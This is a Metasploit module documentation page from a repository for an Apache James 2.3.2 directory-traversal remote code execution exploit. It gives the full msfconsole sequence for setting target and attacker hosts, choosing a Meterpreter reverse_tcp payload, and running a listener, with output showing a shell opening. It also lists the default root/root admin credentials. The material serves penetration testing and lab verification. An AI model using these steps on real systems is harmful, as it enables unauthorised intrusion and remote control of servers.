adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
195d699df04875b7dbf5aaf1e2d27fb9b3d287cd
metasploit-gs/documentation/modules/exploit/linux/smtp/apache_james_exec.md
T

78 lines
2.9 KiB
Markdown
Raw Normal View History

Add module documentation.
2020-01-18 19:06:59 -08:00
## Vulnerable Application
This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:
https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
## Verification Steps
1. Load the module:
```
msf5 > use exploit/linux/smtp/apache_james_exec
```
2. Set remote and local options:
```
msf5 exploit(linux/smtp/apache_james_exec) > set target 1
target => 1
msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
rhosts => 192.168.224.164
msf5 exploit(linux/smtp/apache_james_exec) > set rport 25
rport => 25
msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
lport => 4444
```
3. Set payload:
```
msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
```
4. Check version and run exploit:
```
msf5 exploit(linux/smtp/apache_james_exec) > check
[*] 192.168.224.164:25 - The target appears to be vulnerable.
msf5 exploit(linux/smtp/apache_james_exec) > exploit
[*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
```
5. Set up and run listener (Can be done before running exploit):
```
msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.224.167:4444
[*] Sending stage (3021284 bytes) to 192.168.224.164
[*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
meterpreter >
```
## Options
**USERNAME:** The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
**PASSWORD:** The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
**ADMINPORT:** The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
**RHOSTS:** The IP address of the vulnerable server.
**RPORT:** The port number of the SMTP service.
## Targets
```
Id Name
-- ----
0 Linux x86
1 Linux x64
```
## References
1. <https://www.exploit-db.com/exploits/35513>
2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>
Reference in New Issue Copy Permalink